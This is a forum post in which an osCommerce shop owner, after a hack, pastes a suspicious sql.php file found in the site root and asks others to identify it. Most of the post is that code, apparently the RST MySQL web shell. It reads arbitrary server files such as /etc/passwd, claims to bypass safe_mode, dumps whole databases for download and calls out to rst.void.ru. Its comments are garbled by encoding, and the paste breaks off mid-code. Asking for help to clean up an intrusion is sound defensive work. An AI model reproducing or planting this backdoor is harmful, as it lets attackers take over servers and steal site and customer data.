Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hack File? Suspicious Sql.php on Root....


ttmw

Recommended Posts

My site recently got hacked and i'm trying to rid of all the hacker files and search for anything suspicious...i've just come across a file in my root folder called sql.php that looks a little suspicious. I was wondering if anyone could confirm it is either useless or definitely spam/hack file. Maybe it will stop someone else getting any problems too. I've had to trim it to fit in a post, but im guessing someone will be able to tell sharpish if its a little dodgy...

 

<?php
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@set_magic_quotes_runtime(0); //ËÁ·‡‚ËÚ¸Òˇ ÓÚ ÒίÂÈ ÔË ÔÓÎÛ˜ÂÌËË ‰‡ÌÌ˚ı ËÁ هȷ
$self=$HTTP_SERVER_VARS['PHP_SELF'];
if(!ini_get("register_globals")){ 
import_request_variables("GPC"); 
}
//≈ÒÎË php ‰Ó·‡‚ËÎ ÒίË, ËÁ·‡‚ËÚ¸Òˇ ÓÚ ÌËı.—ÎÂ¯Ë ·Û‰ÛÚ Û‰‡ÎÂÌ˚ Í‡Í ËÁ „ÎÓ·‡Î¸Ì˚ı 
//χÒÒË‚Ó‚, Ú‡Í Ë ËÁ ‚ÒÂı ÔÂÂÏÂÌÌ˚ı, ÍÓÚÓ˚ ӷ‡ÁÛ˛ÚÒˇ ÔË register_globals=on
if (get_magic_quotes_gpc()) strips($GLOBALS);
function strips(&$el) { 
 if (is_array($el)) { 
   foreach($el as $k=>$v) { 
     if($k!='GLOBALS') { 
       strips($el[$k]); 
     } 
   } 
 } else { 
   $el = stripslashes($el); 
 } 
}
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
   $file = "C:\\tmp\\dump_".$db.".sql";
   $p_v=$SystemRoot."\my.ini";
   $os="win";
} else {
   $file = "/tmp/dump_".$db.".sql"; 
   $p_v="/etc/passwd";
}
if ($HTTP_GET_VARS['send']=='send_http') {
function download($file, $type = false, $name = false, $down = false) { 
if(!file_exists($file)) exit; 
if(!$name) $name = basename($file); 
if($down) $type = "application/force-download"; 
else if(!$type) $type = "application/download"; 
$disp = $down ? "attachment" : "inline";
header("Content-disposition: ".$disp."; filename=".$name); 
header("Content-length: ".filesize($file)); 
header("Content-type: ".$type); 
header("Connection: close"); 
header("Expires: 0");
set_time_limit(0); 
readfile($file); 
unlink($file);
exit; 
} 
if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  if (sizeof($tabs) == 0) { 
     // ÔÓÎÛ˜‡ÂÏ ÒÔËÒÓÍ Ú‡·Îˈ ·‡Á˚ 
     $res = mysql_query("SHOW TABLES FROM $db", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_row($res)) { 
           $tabs[] .= $row[0]; 
        } 
     } 
  } 
      // ÓÚÍ˚‚‡ÂÏ Ù‡ÈÎ ‰Îˇ Á‡ÔËÒË ‰‡ÏÔ‡ 
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
  foreach($tabs as $tab) {       
     if ($add_drop) { 
        fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
     }        
     // ÔÓÎÛ˜‡ÂÏ ÚÂÍÒÚ Á‡ÔÓÒ‡ ÒÓÁ‰‡Ìˡ ÒÚÛÍÚÛ˚ Ú‡·Îˈ˚ 
     $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
     $row = mysql_fetch_row($res); 
     fputs($fp, $row[1].";\n\n"); 

     // ÔÓÎÛ˜‡ÂÏ ‰‡ÌÌ˚ ڇ·Îˈ˚ 
     $res = mysql_query("SELECT * FROM `$tab`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     } 
     fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
  } 
  fclose($fp);
}
if ($HTTP_GET_VARS['strukt']=='d_strukt'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
     // ÔÓÎÛ˜‡ÂÏ ÚÂÍÒÚ Á‡ÔÓÒ‡ ÒÓÁ‰‡Ìˡ ÒÚÛÍÚÛ˚ Ú‡·Îˈ˚ 
     $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
     $row = mysql_fetch_row($res); 
     fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
     fputs($fp, $row[1].";\n\n");        
     // ÔÓÎÛ˜‡ÂÏ ‰‡ÌÌ˚ ڇ·Îˈ˚ 
     $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     }

  fclose($fp); 
}
if ($HTTP_GET_VARS['strukt']=='t_strukt'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
  fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
  date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
     $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
     $row = mysql_fetch_row($res); 
     fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
     fputs($fp, $row[1].";\n\n");   
  fclose($fp);
}
if ($HTTP_GET_VARS['strukt']=='d'){
  $host = $HTTP_SERVER_VARS["SERVER_NAME"];
  $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
  $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
  mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
  $fp = fopen($file, "w"); 
     $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
     if (mysql_num_rows($res) > 0) { 
        while ($row = mysql_fetch_assoc($res)) { 
           $keys = implode("`, `", array_keys($row)); 
           $values = array_values($row); 
           foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
           $values = implode("', '", $values); 
           $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
           fputs($fp, $sql); 
        } 
     } 
  fclose($fp); 
}
download($f_dump);
}
function send_header() {
  header("Content-type: image/gif");
  header("Cache-control: public");
  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  header("Cache-control: max-age=".(60*60*24*7));
  header("Last-Modified: ".date("r",filemtime(__FILE__)));
}
if ($HTTP_GET_VARS['img']=='st_form_bg') {
  $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
  send_header();
  echo base64_decode($st_form_bg);
}
if ($HTTP_GET_VARS['img']=='bg_f') {
$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
     'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
     'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
  send_header();
  echo base64_decode($bg_f);
}
if ($HTTP_GET_VARS['img']=='b_close') {
$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
        'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
        'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
        'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
        'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
        '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
        'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
        'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
        'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
        'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
        'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
        'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
        '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
        'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
        'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
        'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
        'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
        'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
        'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
        'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
  send_header();
  echo base64_decode($b_close);
} 
$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Œ¯Ë·Í‡ ‚ Á‡ÔÓÒÂ:</b><tr><td align=center><br><h5>";
$f_error="</h5></td></tr></table>
<CENTER><FORM><INPUT type=\"button\" value=\"   << Õ‡Á‡‰    \" onClick=\"history.go(-1)\"><BR>
</FORM></CENTER>
</td></tr></table></td></tr></table>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table>";

print "
 <html><HEAD><TITLE>RST MySQL</TITLE>

 <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
  <style>
  td {  
  font-family: verdana, arial, ms sans serif, sans-serif;  
  font-size: 11px;  
  color: #000000; 
  }
  BODY {
  margin-top: 4px; 
  margin-right: 4px; 
  margin-bottom: 4px; 
  margin-left: 4px;
  scrollbar-face-color: #b6b5b5;
  scrollbar-highlight-color: #758393; 
  scrollbar-3dlight-color: #000000; 
  scrollbar-darkshadow-color: #101842; 
  scrollbar-shadow-color: #ffffff; 
  scrollbar-arrow-color: #000000;
  scrollbar-track-color: #ffffff; 
  }
  A:link {COLOR:blue; TEXT-DECORATION: none}
  A:visited { COLOR:blue; TEXT-DECORATION: none}
  A:active {COLOR:blue; TEXT-DECORATION: none}
  A:hover {color:red;TEXT-DECORATION: none}
  input, textarea, select {
  background-color: #EBEAEA;
  border-style: solid;
  border-width: 1px;
  font-family: verdana, arial, sans-serif;
  font-size: 11px;
  color: #333333;
  padding: 0px;
  }
 </style></HEAD><BODY>";


if ($sapi_type == "cgi") {
   $php_type="CGI";
} else {
   $php_type="ÏÓ‰Ûθ";
}

$form_file="
       <table width=80% align=center border=0>
       <tr><td align=center>◊ÚÂÌË ÔÓËÁ‚ÓθÌӄӠهȷ, ÒÂ‚Â‡ ( <b>$server</b> )</td></tr>
       <tr><td>
       <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0>
       <tr bgcolor=#DBDCDD><td align=center>
       œË ÛÒÎÓ‚ËË, ˜ÚÓ Ù‡ÈÎ ‰ÓÒÚÛÔÂÌ ‰Îˇ <b>˜ÚÂÌˡ</b> Ë ÔË
       ̇΢ËË Û ÔÓθÁÓ‚‡ÚÂΡ ÔË‚Ë΄ËË <b>FILE</b>, <b>SELECT</b>,
       <b>CREATE</b>, Ô‡‚ËθÌÓÏ ÔÛÚË Ë ËÏÂÌË - ‚ÓÁÏÓÊÌÓ ˜ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·.
       Œ·ıÓ‰ Ó„‡Ì˘ÂÌËÈ ÔË <b>safe_mode</b> Ë <b>safe_basedir</b>
       </td></tr></table></td></tr>
       <form method=\"get\" action=\"$self?f=x_file\">
       <input type=\"hidden\" name=\"s\" value=\"$s\">                
       <input type=\"hidden\" name=\"server\" value=\"$server\">
       <input type=\"hidden\" name=\"port\" value=\"$port\">
       <input type=\"hidden\" name=\"login\" value=\"$login\">
       <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
       <tr><td align=center><br>œÓÎÌ˚È ÔÛÚ¸ Í Ù‡ÈÎÛ: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\">    
       <input type=\"submit\" value=\"ÔÓ͇Á‡Ú¸ Ù‡ÈÎ\">    </td></tr></table><br>";

$start_form="<br>
<table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td>
<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td width=25>
               <font face=Webdings size=6>Ņ</font>
           </td>
           <td>
               <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font>
           </td>
           <td width=33% align=right>
               ".date ("j F- Y- g:i")."  
           </td>
        </tr>
     </table> 
</td></tr>
</table>

</td></tr>
<tr><td>

<table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td bgcolor=#DBDCDD valign=top width=200><br>
       <center><b>”ÚËÎËÚ‡ ‰Îˇ ‡·ÓÚ˚ Ò MySQL</b></center><hr width=98%>
       <li>œÓÒÏÓÚ ·‡Á Ë Ú‡·Îˈ.
       <li>œÓËÁ‚ÓθÌ˚ Á‡ÔÓÒ˚ Í ¡ƒ.
       <li>–‰‡ÍÚËÓ‚‡ÌË ·‡Á Ë Ú‡·Îˈ.
       <li>ƒ‡ÏÔ˚ ¡ƒ ËÎË Ú‡·Îˈ.<hr width=98%>
       Type - FREE<br>
       Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a>
       <center><br><br><font face=Webdings size=+18 color=#B6B5B5>¨</font><center>
  </td>
  <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2>
       <br>ƒÎˇ ÒÓ‰ËÌÂÌˡ Ò ÒÂ‚ÂÓÏ MySQL ‚‚‰ËÚ <b>»Ãfl</b>, <b>œ¿–ŒÀ‹</b> (ÔÓθÁÓ‚‡ÚÂΡ MySQL) Ë ËÏˇ <b>’Œ—“¿</b>.</font></center><br>
       <li>≈ÒÎË ÎÓ„ËÌ ˛ÁÂ‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ËÏˇ ‚·‰Âθˆ‡ ÔÓˆÂÒÒ‡.
       <li>≈ÒÎË Ô‡Óθ ˛ÁÂ‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÛÒÚÓÈ Ô‡Óθ.
       <li>≈ÒÎË ËÏˇ Ò‚‚Â‡ mysql Ì Û͇Á‡ÌÓ ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ <b>localhost</b>
       <li>≈ÒÎË ÔÓÚ ‰Îˇ Ò‚‚Â‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ  ÔÓÚ ÔÓ ÛÏÓΘ‡Ì˲, Ó·˚˜ÌÓ (<b>3306</b>)<br><br>
       <center>¬ÂÒˡ PHP (<b>".phpversion()."</b>)          ID PHP script (<b>".get_current_user( )."</b>)</center>
       <br><table align=center>
       <tr><td>ËÏˇ ˛ÁÂ‡ MySQL</td><td align=right>Ô‡Óθ ˛ÁÂ‡ MySQL </td></tr>
       <form method=\"get\" action=\"$self\">
       <input type=\"hidden\" name=\"s\" value=\"y\">
       <tr>
         <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td>
         <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td>
       </tr>
       <tr><td>—Â‚Â MySQL</td><td>ÔÓÚ</td></tr>
       <tr>                
         <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td>
         <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\">
         <input type=\"submit\" value=\"ÔÓ‰Íβ˜ËÚ¸Òˇ\"></td>
       </tr></table><br>        
  </td>
</tr>
</table>

</td></tr>
<tr><td>
<table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td align=center>
               free script ©RusH Security Team 
           </td>
        </tr>
     </table> 
</td></tr>
</table>
</td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center>
";

if ($os =='win') {
$os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
}else{
  $str_k=$_ENV["BOOT_FILE"];
  $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
  $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";

}

if (!isset($s) || $HTTP_GET_VARS[s] != 'y') { print $start_form;
$serv = array(127,192,172,10);
$adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
if (!in_array($adrr[0], $serv)) {
  //ÔË ÔÓˇ‚ÎÂÌËË ÌÓ‚ÓÈ ‚ÂÒËË ÛÚËÎËÚ˚ ÔÓ͇ÊÂÏ ˜ÚÓ ‰ÓÒÚÛÔ̇
  //ÌÓ‚‡ˇ ‚ÂÒˡ Ë Ô‰ÎÓÊËÏ Á‡„ÛÁËÚ¸ ÂÂ Ò Ò‡ÈÚ‡
  @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
  @readfile ("http://rst.void.ru/version_sql/version.php");  
}
exit;
}

$form_ad_b="<br>
<table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> 
<tr>
  <td>
  <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> 
   <td>
     MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>)
  </td>
  <td align=center>
     <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b>
  </td>
  <td align=right>
     ¬ÂÒˡ PHP (<b>".phpversion()."</b>) $php_type
  </td>
</tr>
<tr bgcolor=#DBDCDD>
  <td>
     IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b>
  </td>
  <td align=center>
     ID PHP script (<b>".get_current_user( )."</b>)
  </td>
  <td align=right>
     $os
  </td>
</tr>
</table>
</td></tr></table>
<table width=80% align=center border=0 cellpadding=5 cellspacing=1> 
<tr>
  <td>
       <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>—Ú‡ÚËÒÚË͇ MySQL</b></a>
  </td>
  <td align=center>
       <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>»ÌÙÓχˆËˇ PHP (ALL)</b></a>
  </td>
  <td align=right>
       <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÓˆÂÒÒ˚ MySQL </b></a>
  </td>
</tr>
<tr>
  <td>
       <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ Apache </b></a>
  </td>
  <td align=center>
       <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ MySQL </b></a> 
  </td>
  <td align=right>
       <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"œÓÒÏÓÚ ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È· ÒÂ‚Â‡ ‰‡Ê ÔË ‚Íβ˜ÂÌÓÏ safe_mode Ë safe_mode_exec_dir\"><b>‘‡ÈÎ *?</b></a>
  </td>
</tr>
</table><br>

<table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
<tr bgcolor=#DBDCDD><td>
<table align=center cellpadding=0 cellspacing=0>
<tr bgcolor=#DBDCDD>
  <td> <table cellpadding=4><tr><td><b>—ÓÁ‰‡Ú¸ ÌÓ‚Û˛ ·‡ÁÛ ‰‡ÌÌ˚ı</b></td></tr><tr><td>
       <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\">
       <input type=\"hidden\" name=\"s\" value=\"$s\">
       <input type=\"hidden\" name=\"server\" value=\"$server\">
       <input type=\"hidden\" name=\"port\" value=\"$port\">
       <input type=\"hidden\" name=\"login\" value=\"$login\">
       <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
       <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\">
       <input type=\"submit\" value=\"ÒÓÁ‰‡Ú¸\"></td>
       </tr></table>
  </td>
</tr>
</table>
</td>    
</tr></table></form>

<table width=80% align=center border=0 cellpadding=0>
<tr align=right>
  <td width=85%></td>
  <td width=15>
   <a href=$self><img src=".$self."?img=b_close border=0 title=close></a>
 </td>
</tr>
</table>
";

$cnt_b=mysql_num_rows(mysql_list_dbs());  // ÍÓÎ-‚Ó ·‡Á mysql ÒÂ‚Â‡  
print "
<table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td>
<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
<tr><td>
     <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
        <tr>
           <td>
               <font face=Webdings size=6>Ņ</font>
           </td>
           <td width=33%>
               <font size=4><b>RST MySQL</b></font>
           </td>
           <td width=33% align=center>
               <font color=blue><b>$server</b></font> [CONNECTION Ok]   ¬ÒÂ„Ó ·‡Á: <b>$cnt_b</b>
           </td>
           <td width=33% align=right>
               ".date ("j F- Y- g:i")."  
           </td>
        </tr>
     </table> 
</td></tr>
</table>

</td></tr>
<tr><td>

<table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF>
<tr>
  <td bgcolor=#DBDCDD valign=top width=170>";

if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
$connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Œ¯Ë·Í‡ ÒÓ‰ËÌÂÌˡ Ò MySQL ÒÂ‚ÂÓÏ <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>¬ÂÓˇÚÌ˚ ӯ˷ÍË:</b><li>Õ Ô‡‚ËθÌ˚È ‡‰ÂÒ ÒÂ‚Â‡ <b>$server</b><li>Õ Ô‡‚ËθÌ˚È ÌÓÏÂ ÔÓÚ‡ <b>$port</b><li>Õ ‚ÂÌÓ ËÏˇ (login) ˛ÁÂ‡ mysql <b>$login</b><li>Õ ‚ÂÌ˚È Ô‡Óθ (password) ˛ÁÂ‡ mysql <b>$passwd</b><li>ƒÓÒÚÛÔ Í ÒÂ‚ÂÛ $server Á‡Ô¢ÂÌ Ò ‡‰ÂÒ‡ <b>".getenv('REMOTE_ADDR')."</b><li>”‰‡ÎÂÌÌ˚È ÒÂ‚Â ‚ÂÏÂÌÌÓ Ì ‰ÓÒÚÛÔÂÌ</td></tr></table><br></td></tr></table><script>alert('Õ ‚ÓÁÏÓÊÌÓ ÛÒÚ‡ÌÓ‚ËÚ¸ ÒÓ‰ËÌÂÌËÂ Ò MySQL ÒÂ‚ÂÓÏ $server \\n\\n œÓ‚Â¸Ú Ô‡‚ËθÌÓÒÚ¸ ‚ıÓ‰ˇ˘Ëı ‰‡ÌÌ˚ı:\\n\\nÒÂ‚Â $server\\nÔÓÚ $port\\nËÏˇ $login\\nÔ‡Óθ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
}


/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
/*œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚ ÒÂ‚Â‡*/
if ($connection&&!isset($db)) {
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
          "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÂÌÛÚ¸Òˇ ‚ ̇˜‡ÎÓ Ë Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ ·‡Á\"><font color=green><b>".
          "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr></table>";

  $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
  while ( $row=mysql_fetch_row($result) ){
      $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //ÍÓÎ-‚Ó Ú‡·Îˈ ·‡Á˚   
      print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
      if ($cnt_title < 1) {
        print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
      }else{
        print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
      }
      print "</td></tr></table>";
   }
}

// ÒÔËÒÓÍ Ú‡·Îˈ ·‡Á˚ ‰‡ÌÌ˚ı
if (isset($db)){          
